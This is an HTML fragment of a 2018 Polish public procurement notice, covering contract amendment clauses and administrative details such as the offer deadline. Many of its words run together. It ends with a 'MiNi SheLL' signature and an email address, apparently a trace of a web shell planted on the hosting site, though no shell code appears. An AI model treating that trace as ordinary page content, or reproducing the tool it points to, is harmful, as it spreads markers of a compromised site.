atmosferycznychuniemożliwiających prowadzenie robót budowlanych zgodnie z technologią ich wykonania. Wtakim przypadku możliwe będzie wydłużenie terminu realizacji umowy o czas ichwystępowania; c) działania siły wyższej - rozumianej jako wystąpienie zdarzenianadzwyczajnego, zewnętrznego, niemożliwego do przewidzenia i zapobieżenia, którego niedało się uniknąć nawet przy zachowaniu najwyższej staranności, a które uniemożliwiaWykonawcy wykonanie jego zobowiązania w całości lub części. W razie wystąpienia siływyższej strony umowy zobowiązane są do dołożenia wszelkich starań w celu ograniczenia dominimum opóźnienia w wykonywaniu swoich zobowiązań umownych powstałych na skutekdziałania siły wyższej, 3) Zmiany osoby/osób przy pomocy, której/ych Wykonawca realizujeprzedmiot umowy. W przypadku braku możliwości wykonywania przedmiotu umowy przezwskazaną/e osobę/y, (rozwiązanie umowy, śmierć, długotrwała choroba, utrata uprawnień, inneuzasadnione okoliczności niepozwalające wykonywać wskazanym osobom powierzoneczynności) wówczas Wykonawca może powierzyć te czynności innym osobom okwalifikacjach (uprawnieniach) spełniających, co najmniej takie warunki jakie podano wspecyfikacji istotnych warunków zamówienia (SIWZ) dla przeprowadzonego postępowania. 4)Zmiany, rezygnacji, bądź wprowadzenia podwykonawcy w trakcie realizacji umowy wzakresie nie przewidzianym w ofercie; jeżeli zmiana lub rezygnacja z podwykonawcy dotyczypodmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 22austawy Prawo zamówień publicznych, w celu wykazania spełniania warunków udziału wpostępowaniu, o których mowa w art. 22 ust. 1 tej ustawy, Wykonawca jest obowiązanywykazać Zamawiającemu, iż proponowany inny podwykonawca lub Wykonawca samodzielniespełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzieleniezamówienia. W tym celu zobowiązany jest przedłożyć stosowne dokumenty wymagane wpostanowieniach SIWZ. Ponadto nowy podwykonawca o którym wyżej mowa nie możepodlegać wykluczeniu w oparciu o przesłanki zawarte w art. 24 ust. 1 lub art. 24 ust. 5 ustawyPzp wskazane w SIWZ. W tym celu Wykonawca zobowiązany jest przedłożyć stosownedokumenty wymagane w postanowieniach SIWZ (oświadczenie analogiczne do tego które byłoskładane w postępowaniu o udzielenie zamówienia publicznego). 5) Zmiany powszechnieobowiązujących przepisów prawa mających wpływ na treść złożonej oferty w takim zakresie wjakim będzie to niezbędne w celu dostosowania postanowień Umowy do zaistniałego stanuprawnego, 6) Zastąpienia Wykonawcy, któremu Zamawiający udzielił zamówienia, nowymwykonawcą w wyniku połączenia, podziału, upadłości, restrukturyzacji lub nabyciadotychczasowego Wykonawcy lub jego przedsiębiorstwa, o ile nowy wykonawca spełniawarunki udziału w postępowaniu i nie zachodzą wobec niego podstawy wykluczenia napodstawie art. 24 ust.1. ustawy Pzp oraz nie pociąga to za sobą innych istotnych zmian umowy, lub przekształcenie Wykonawcy będącego następstwem sukcesji uniwersalnej, wzwiązku z sukcesją generalną, dziedziczeniem spółek handlowych zgodnie z KSH, a takżesukcesją z mocy prawa, zgodnie z obowiązującymi przepisami prawa. PrzekształconyWykonawca musi nadal spełniać warunki udziału w postępowaniu oraz nie mogą zachodzićwobec niego podstawy wykluczenia na podstawie art. 24 ust. 1 ustawy Pzp lub art.24 ust. 5ustawy Pzp wskazane w SIWZ. 7) Zmiana nazwy Wykonawcy wskutek zaistnieniaokoliczności warunkujących dokonanie zmiany nazwy Wykonawcy. 3. Zmianie podlegajątakże inne postanowienia w stosunku do treści oferty jeżeli konieczność wprowadzenia takichzmian wynika z następujących okoliczności: 1) Zmiana Inspektora nadzoru ze stronyZamawiającego, w przypadku braku możliwości wykonywania wskazanych czynności przez tęosobę - zmiana ta następuje poprzez pisemne zgłoszenie tego faktu drugiej Stronie i niewymaga zawarcia aneksu do umowy, 2) Zmiana danych związana z obsługą administracyjnoorganizacyjnąumowy, zmiana danych teleadresowych Wykonawcy lub Zamawiającego -zmiana ta następuje poprzez pisemne zgłoszenie tego faktu drugiej Stronie i nie wymagazawarcia aneksu do umowy. Zmiana nazwy Wykonawcy - winno nastąpić w formie aneksu doumowy. 4. Zmiany postanowień umowy następują zgodnie z zasadami określonymi w umowieoraz przy zastosowaniu przepisów ustawy Prawo zamówień publicznych i nie mogą prowadzićdo zmiany charakteru umowy. 5. W przypadku wystąpienia okoliczności stanowiącychpodstawę do zmiany umowy, każda ze Stron może wystąpić z wnioskiem na piśmie w sprawiemożliwości dokonania takiej zmiany. We wniosku należy opisać, uzasadnić zmianę orazdołączyć stosowne dokumenty - dotyczy to przypadków kiedy dla potwierdzenia dokonaniazmiany zasadnym jest przedłożenie odpowiednich dokumentów. 6. Wszelkie zmiany iuzupełnienia niniejszej umowy dokonane w sposób zgodny z ustawą Prawo zamówieńpublicznych wymagają formy pisemnej pod rygorem nieważności w drodze aneksu do umowyskutecznego po podpisaniu przez obie Strony, z zastrzeżeniem przypadków określonych wniniejszym paragrafie, w których wskazano, że nie jest wymagane zawarcie aneksu do umowy.7. Zmiana umowy dokonana z naruszeniem przepisów ustawy Prawo zamówień publicznychjest nieważna.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2018-07-13</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">Polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com